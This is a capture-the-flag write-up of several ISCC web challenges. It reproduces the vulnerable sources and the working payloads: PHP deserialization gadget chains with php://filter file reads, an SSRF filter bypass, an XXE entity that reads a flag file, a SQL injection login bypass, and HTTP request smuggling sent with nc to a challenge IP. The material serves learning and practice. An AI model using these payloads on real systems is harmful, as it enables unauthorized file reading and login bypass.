ISCC-WEB



WEB

冬奥会

源码:

<?php
// Challenge source for "冬奥会" (ISCC). The checks are intentionally weak;
// the comments mark the exact conditions the payload has to satisfy.
show_source(__FILE__);
$Step1=False;
$Step2=False;
// Attacker-controlled JSON, cast to array. Invalid JSON decodes to null,
// which casts to an empty array (the "array(0) { }" seen on first visit).
$info=(array)json_decode(@$_GET['Information']);
if(is_array($info)){
    var_dump($info);
    // Numeric years are rejected outright, so a plain "2022" never passes.
    is_numeric(@$info["year"])?die("Sorry~"):NULL;
    if(@$info["year"]){
        // NOTE: single '=' is an assignment, not a comparison, so the
        // condition is always truthy: any non-numeric truthy "year" sets $Step1.
        ($info["year"]=2022)?$Step1=True:NULL;
    }
    if(is_array(@$info["items"])){
        // items must have exactly 3 entries and items[1] must itself be an array.
        if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
        // array_search() compares loosely (==). On PHP < 8, 0 == "skiing" is
        // true, which is why the payload's third item is the integer 0; PHP 8
        // changed int/non-numeric-string comparison, so this depends on the
        // server's PHP version.
        $status = array_search("skiing", $info["items"]);
        $status===false?die("Sorry~"):NULL;
        // Strict (===) check: the literal string "skiing" itself is forbidden.
        foreach($info["items"] as $key=>$val){
            $val==="skiing"?die("Sorry~"):NULL;
        }
        $Step2=True;
    }
}
if($Step1 && $Step2){
    include "2022flag.php";echo $flag;
}
?> 
//array(0) { } 

代码审计:GET 传参 Information,经 json_decode 后强转为数组。要求:year 不能通过 is_numeric(所以纯数字 2022 会被拒绝),但只要是真值即可——第 22 行的 `$info["year"]=2022` 是赋值而不是比较,永远为真,因此 "2022a" 这类非数字字符串就能让 Step1 为真;items 必须是恰好 3 个元素的数组,且 items[1] 本身是数组;array_search("skiing") 用的是宽松比较,放一个整数 0 就能命中(PHP 7 下 0 == "skiing" 为真,PHP 8 已改变该规则),而后面的 === 检查又禁止直接写 "skiing"。因为是 json_decode,格式为 {"key1":obj1,"key2":"obj2",...}。 ?Information={"year":"2022a","items":["gh",["asaf","qweas"],0]}

这个题目收获了json数据的格式,以及三个等于号和两个等于号的区别。

Pop2022

Happy New Year~ MAKE A WISH
<?php
echo 'Happy New Year~ MAKE A WISH<br>';
// Entry point: attacker-controlled data goes straight into unserialize(),
// so every class below with a magic method is a potential gadget
// (__wakeup() already runs inside unserialize()). Errors are suppressed with @.
if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    // String conversion reads a property of $string; with $string set to a
    // Make_a_Change this reaches Make_a_Change::__get('page').
    public function __toString(){
        return $this->string->page;
    }
    // Runs during unserialize(). The blacklist only inspects $page as a
    // string: when $page holds another Road_is_Long object, preg_match()
    // stringifies it through __toString(), which starts the gadget chain
    // before the filter can reject anything.
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    protected  $var;
    // The sink: include() of an attacker-chosen path. Nothing filters $var,
    // so php://filter wrappers (e.g. base64-encoding flag.php) go through.
    public function append($value){
        include($value);
    }
    // Fires when an instance is called like a function, i.e. $function()
    // inside Make_a_Change::__get().
    public function __invoke(){
        $this->append($this->var);
    }
}
class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }
    // Reading any undefined property calls $effort as a function. The
    // constructor default (an array) is never used on the unserialize path:
    // an unserialized $effort holding a Try_Work_Hard triggers its __invoke().
    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/ 

题目的利用链:反序列化时外层 Road_is_Long 执行 __wakeup(),preg_match() 会把 $page 当作字符串处理;把 $page 设为另一个 Road_is_Long 对象,就触发它的 __toString(),读取 $this->string->page;string 指向 Make_a_Change,访问不存在的 page 属性触发 __get(),执行 $effort();effort 指向 Try_Work_Hard,触发 __invoke() → append() → include($var);把 var 设为 php://filter/read=convert.base64-encode/resource=flag.php,即可让 flag.php 的源码以 base64 形式输出而不是被执行。

payload

<?php
class Try_Work_Hard {
    // Tail of the gadget chain: the path the target's Try_Work_Hard::__invoke()
    // will include(). The filter wrapper base64-encodes flag.php instead of
    // executing it, so the source comes back in the response.
    protected $var;

    public function __construct()
    {
        $this->var = 'php://filter/read=convert.base64-encode/resource=flag.php';
    }
}

class Make_a_Change {
    // Only the property name matters for the serialized gadget: the target's
    // __get() calls whatever object ends up stored here.
    public $effort = null;
}

class Road_is_Long {
    public $page;
    public $string;

    // Every instance carries a Make_a_Change in $string so that the target's
    // __toString() reaches Make_a_Change::__get(). $page stays null unless the
    // caller nests another Road_is_Long in it (the outer object of the chain).
    public function __construct()
    {
        $this->page = null;
        $this->string = new Make_a_Change;
    }
}

// Inner object: its __toString() -> Make_a_Change::__get() -> Try_Work_Hard::__invoke().
$inner = new Road_is_Long();
$inner->string->effort = new Try_Work_Hard();

// Outer object: its __wakeup() stringifies $page (the inner object), which
// is what kicks the chain off during unserialize().
$outer = new Road_is_Long;
$outer->page = $inner;
echo urlencode(serialize($outer));
?>
?wish=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BN%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BN%3B%7D%7D

通过这个题目收获了php序列化和反序列化。还有php伪协议读取文件内容。

这是一道代码审计题

打开出现一个 /index,查看源代码,提示要传参 url;继续查找发现了下面这个源码文件(其中用到的表情解密工具:www.atoolbox.net/Tool.php?Id…)。

def geneSign():
    """Serve index.html only once judge_ip() has set the module-level
    ``control_key`` to 1; any other state gets the denial string."""
    if control_key != 1:
        return "You have not access to this page!"
    return render_template("index.html")
def check_ssrf(url):
    # Gatekeeper for the ``url`` parameter. Only the ``https?://@host`` form
    # (the second regex) can ever return True, through judge_ip(); the plain
    # ``https?://host`` form is resolved and then rejected on both branches.
    # Return shape is inconsistent: bare True on success, (False, msg) otherwise.
    hostname = urlparse(url).hostname
    try:
        if not re.match('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        if  re.match('https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            # Empty userinfo before '@': urlparse() still yields the host part,
            # which judge_ip() compares against the base64 form of addr.
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            # DNS-resolves the name and classifies the first address; note
            # that both outcomes below are rejections, so this path never passes.
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        # Unreachable: the clause above already catches every BaseException.
        return False, "unknow error"
def ip2long(ip_addr):
    """Dotted-quad IPv4 string -> unsigned 32-bit int (network byte order).

    Raises OSError (from socket.inet_aton) for strings that are not IPv4.
    """
    (value,) = struct.unpack("!L", socket.inet_aton(ip_addr))
    return value
def is_inner_ipaddress(ip):
    """Return True when ``ip`` (dotted quad) falls in 127/8, 10/8, 172.16/12,
    192.168/16 or 0/8. Prints the integer form as a leftover debug side effect."""
    value = ip2long(ip)
    print(value)
    # (network, right-shift) pairs; the shift keeps exactly the prefix bits.
    private_ranges = (
        ("127.0.0.0", 24),
        ("10.0.0.0", 24),
        ("172.16.0.0", 20),
        ("192.168.0.0", 16),
        ("0.0.0.0", 24),
    )
    return any(
        ip2long(network) >> shift == value >> shift
        for network, shift in private_ranges
    )
def waf1(ip):
    """Character blacklist: True (blocked) when ``ip`` contains any of
    '.', '0', '1', '2', '7' after lower-casing; False for empty/None input.

    The base64 form of "127.0.0.1" ("mti3ljaumc4x" lower-cased) contains
    none of these characters, which is the bypass the writeup relies on.
    """
    forbidden = ('.', '0', '1', '2', '7')
    if not ip:
        return False
    lowered = ip.lower()
    return any(token in lowered for token in forbidden)
def judge_ip(ip):
    # Compares the URL's hostname with the lower-cased base64 of ``addr``
    # (per the writeup addr is "127.0.0.1": base64 "MTI3LjAuMC4x" -> "mti3ljaumc4x").
    # waf1() never sees the dotted form, so its blacklist is bypassed.
    # As transcribed here: ``Fasle``/``Fals`` are undefined names (NameError,
    # presumably typos for False in the real source); ``addr`` is assigned
    # below, so Python treats it as a local and the read raises
    # UnboundLocalError unless the original defines it differently; and
    # base64.encodestring() no longer exists on Python >= 3.9.
    if(waf1(ip)):
        return Fasle
    else:
        addr = addr.encode(encoding = "utf-8")
        ipp = base64.encodestring(addr)
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return Fals

源码里只有 judge_ip() 返回 True 才会把 control_key 置 1,而这要求 ip==ipp:ipp 是 addr(=127.0.0.1)经 base64 编码再转小写的结果,即 MTI3LjAuMC4x → mti3ljaumc4x。waf1() 只拦截 '.'、'0'、'1'、'2'、'7' 这几个字符,base64 形式里一个都不含,所以用它作为 hostname 就绕过了对 127.0.0.1 的过滤。

/index?url=https://@mti3ljaumc4x //一定要注意这里的 @ 不能丢:check_ssrf() 只有匹配 `https?://@host` 的那条正则才会走到 judge_ip(),不带 @ 的分支会去解析域名,并且无论结果如何都返回 False。
然后进行传参 得到一个cookie aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
将原来的cookie进行替换。
a_cookie = aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==

然后会得到登录页的前端 JS(它把用户名和密码拼接成 XML 后 POST 到 codelogin):

// Front-end login handler from the challenge. The request body is XML built
// by string concatenation from the two inputs with no escaping, so whatever
// the user types is parsed as markup by the server-side /codelogin handler;
// that is the XXE entry point the writeup uses.
function codelogin(){
	var name = $("#name").val();
	var password = $("#password").val();
	// BUG (as shipped): `word` is never declared, so when name is non-empty
	// this comparison throws a ReferenceError instead of checking `password`.
	if(name == "" || word == ""){
		alert("Please enter the username and password!");
		return;
	}

	var data = "<user><name>" + name + "</name><password>" + password + "</password></user>";
    $.ajax({
    	contentType: "application/xml;charset=utf-8",
        type: "POST",
        url: "codelogin",
        data: data,
        dataType: "xml",
        anysc: false, // typo for `async`; presumably ignored, so the request stays asynchronous
        success: function (result) {
        	// Response is XML with <code> and <msg> elements; no null checks.
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });
}
继续构造 XML:前端把输入原样拼接进 XML,而从结果看服务端解析时没有禁用外部实体,所以存在 XXE,可以用外部实体把 flag.txt 读进 name 字段。
XML payload(外部实体 f 指向 ./flag.txt):
<!DOCTYPE ANY [
<!-- External general entity: the server's parser reads ./flag.txt (relative
     to its working directory) and substitutes the contents wherever &f;
     appears, so the file ends up inside <name>. -->
<!ENTITY f SYSTEM "./flag.txt">
]>
<user>
<name>
	&f;
	</name>
<password>
password
</password></user>

然后以post的方式传入 /mti3ljaumc4x/codelogin 就能得到flag 通过这个最主要是学会了把127.0.0.1过滤了,该怎么绕过,这里之前没见过,这次学会了通过base64的格式可以绕过。这里是一个知识点.

Easy-SQL

59.110.159.206:7010?id=-8 --+,得到一个ypHeMPardErE.zip@beaxia.cn,然后访问ypHeMPardErE.zip 会得到源码

<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
// $hostname/$username/$password/$database (and presumably $flag, used
// further down) come from config.php, which is not part of the listing.
$conn = mysqli_connect($hostname, $username, $password, $database);
   if ($conn->connect_errno) {
    die("Connection failed: " . $conn->connect_errno);
} 

echo "Where is the database?"."<br>";

echo "try ?id";

/**
 * Blacklist check that the challenge applies to the POSTed passwd only.
 *
 * Returns true when none of the blocked keywords/characters (matched
 * case-insensitively) occur in $s, false otherwise. The list blocks quotes,
 * spaces, '=' and the usual read primitives, but it is never applied to the
 * username field.
 *
 * @param string $s
 * @return bool
 */
function sqlWaf($s)
{
    $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
    // preg_match() returns 1 on a hit, 0 on no hit and false on error; the
    // negation keeps the original's "allow on error" behaviour.
    return !preg_match($filter, $s);
}

// GET branch: $id is interpolated straight into the query (numeric context,
// no quotes). The only filter is a case-insensitive match on "select", so
// injections that avoid that keyword still run; query failures end in a
// generic die('Error!') that hides the cause.
if (isset($_GET['id'])) 
{
    $id = $_GET['id'];
    $sql = "select * from users where id=$id";
    $safe = preg_match('/select/is', $id);
    if($safe!==0)
        die("No select!");
    $result = mysqli_query($conn, $sql);
    if ($result) 
    {
        // Only the first row's username/passwd columns are displayed.
        $row = mysqli_fetch_array($result);
        echo "<h3>" . $row['username'] . "</h3><br>";
        echo "<h3>" . $row['passwd'] . "</h3>";
    }
    else
        die('<br>Error!');
}

// POST branch: both fields are interpolated into a quoted-string query.
// sqlWaf() is applied to passwd only, so username is unfiltered: the writeup
// closes the quote there and appends a UNION that fabricates an "admin" row
// whose passwd column equals the posted passwd, satisfying the loose == below.
if (isset($_POST['username']) && isset($_POST['passwd'])) 
{

    $username = strval($_POST['username']);
    $passwd = strval($_POST['passwd']);

    if ( !sqlWaf($passwd) )
        die('damn hacker');

    $sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
    $result = $conn->query($sql);
    // If the query fails, $result is false and ->num_rows errors out.
    if ($result->num_rows > 0) {
        $row = $result->fetch_assoc();
        // Strict check on username, but only truthiness on passwd...
        if ( $row['username'] === 'admin' && $row['passwd'] )
        {
            // ...and a loose == here. Once the row comes from the injected
            // UNION the attacker controls both sides of this comparison.
            if ($row['passwd'] == $passwd)
            {
                die($flag);
            } else {
                die("username or passwd wrong, are you admin?");
            }
        } else {
            die("wrong user");
        }
    } else {
        die("user not exist or wrong passwd");
    }
}
mysqli_close($conn); 
?>

要求是 POST 传参 username、passwd。sqlWaf() 只检查 passwd,username 没有任何过滤,可以直接闭合单引号注入;要拿到 flag,查出的那一行需要满足 $row['username'] === 'admin' 且 $row['passwd'] 为真,并且 $row['passwd'] == $passwd(宽松比较)。

payload:username=-1' union values row("admin","admin","admin")%23&passwd=admin。这里利用的是 MySQL 8.0.19+ 的 VALUES 语句:`union values row(...)` 不需要出现 select 关键字就能拼出一行自造的 admin 记录,其 passwd 列正是我们 POST 的 passwd,于是通过了上面的比较。通过这个题目学到了 MySQL 8 的这个特性。

让我康康!

这是一道 HTTP 请求走私题目。用 burpsuite 抓包,响应头显示服务器是 gunicorn/20.0.0;从下面的 payload 可以看出,该版本在收到带 Sec-Websocket-Key1 头的请求时对请求体长度的处理与前端不一致,可以用来走私第二个请求。查看源代码出现一个 try flag 提示,访问 /flag;.txt 后输入 flag,回显 flag is in '/fl4g'。

# Two requests in one TCP stream. The outer POST carries Sec-Websocket-Key1,
# which gunicorn 20.0.0 appears to treat as an 8-byte body (the "xxxxxxxx"
# padding), while the front end honours Content-Length; the bytes after the
# padding are then parsed by gunicorn as a second, smuggled request for /fl4g.
echo -en "POST / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 76\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxPOST /fl4g HTTP/1.1\r\nHost: localhost\r\nContent-Length: 55\r\n\r\nPOST / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

回显本地访问。

# Same smuggling layout as before, now with a secr3t_ip header on the smuggled
# GET /fl4g so the backend's "local access only" check (which presumably reads
# that header) sees 127.0.0.1.
echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: localhost\r\nsecr3t_ip:127.0.0.1\r\nContent-Length: 55\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

这个题目学到了 HTTP 请求走私、请求行和头部里 \r\n 的使用,以及 CL.TE / TE.CL 这类走私方式。

findme

<?php
highlight_file(__FILE__);
class a{
    public $un0;
    public $un1;
    public $un2;
    public $un3;
    public $un4;
    
    // Runs when the unserialized object is released. With un0 set and un2
    // empty it instantiates an arbitrary class (Givemeanew) and then either
    // echoes it (un3 === 'unserialize') or eval()s un2 -- which is empty on
    // this path, so the eval branch is effectively dead.
    public function __destruct(){
        if(!empty($this->un0) && empty($this->un2)){
            $this -> Givemeanew();
            if($this -> un3 === 'unserialize'){
                $this -> yigei();
            }
            else{
                $this -> giao();
            }
        }
    }
    // new $class($arg) with both attacker-controlled: the writeup uses PHP
    // built-ins (GlobIterator to list files, SplFileObject to read one).
    public function Givemeanew(){
        $this -> un4 = new $this->un0($this -> un1);
    }
    // String conversion of un4: for the classes used in the writeup this
    // yields the current directory entry / current file line, which is echoed.
    public function yigei(){
        echo 'Your output: '.$this->un4;
    }
    
    public function giao(){
        @eval($this->un2);
    }
    
    // Runs during unserialize(): un2 is a prefix of an include path, so a
    // php://filter prefix turns it into a base64 read of hint.php.
    public function __wakeup(){
        include $this -> un2.'hint.php';
    }
}
// Sink: the attacker-controlled POST body goes straight into unserialize();
// __wakeup() fires immediately and __destruct() when the object is released.
$data = $_POST['data'];
unserialize($data);

通过 php:// 伪协议(php://filter)读取 hint.php 的内容:

<?php

class a {
    // Only un2 is populated: on the target, __wakeup() does
    // include $un2 . 'hint.php', so the filter prefix base64-encodes hint.php
    // instead of executing it. un0 stays empty so __destruct() does nothing.
    public $un0 = null;
    public $un1 = null;
    public $un2 = 'php://filter/read=convert.base64-encode/resource=';
    public $un3 = null;
    public $un4 = null;
}

// Emit the gadget; the serialized string is what gets POSTed as `data`.
echo serialize(new a());
?>

然后base64解密得到的内容

<?php
// hint.php as recovered from the base64 filter output: the flag is a .txt in
// the same directory whose name starts with "f" and cannot be brute-forced.
$a = 'flag在当前目录下以字母f开头的txt中,无法爆破出来';

目录遍历:

<?php

class a {
    public $un0;
    public $un1;
    public $un2;
    public $un3;
    public $un4;

    // Directory-listing gadget: on the target, Givemeanew() runs
    // new GlobIterator('glob://f*.txt') and yigei() echoes it, printing the
    // first matching filename. un2 stays empty so __wakeup() only includes
    // 'hint.php' and __destruct() takes the unserialize branch.
    public function __construct()
    {
        $this->un0 = 'GlobIterator';
        $this->un1 = 'glob://f*.txt';
        $this->un3 = 'unserialize';
    }
}

// Emit the directory-listing gadget; POST the output as `data`.
echo serialize(new a());

回显出文件名 fA1TE_GRo9rde_OScter5r.txt,再用 SplFileObject 读取该文件:

<?php

class a {
    // File-read gadget: Givemeanew() becomes new SplFileObject(<name>) and
    // echoing it in yigei() prints the file's current (first) line -- the flag.
    public $un0 = 'SplFileObject';
    public $un1 = 'fA1TE_GRo9rde_OScter5r.txt';
    public $un2 = null;
    public $un3 = 'unserialize';
    public $un4 = null;
}

// Emit the file-read gadget; POST the output as `data`.
echo serialize(new a());

回显出 flag ISCC{DQnm19dw_SPxQwQsK_21EnFvN}。这个题目学会了 php 伪协议,以及利用 `new $class($arg)` 实例化 PHP 内置类(GlobIterator 列目录、SplFileObject 读文件)来达到任意文件读取。

爱国敬业好青年-2

主页面是一个假页面:先用 burpsuite 以 GET 方式访问 change 页面,出现一个 open;然后再访问 flag 页面,POST 提交 lati=116°23′E&langti=39°54′N 就能得到 flag。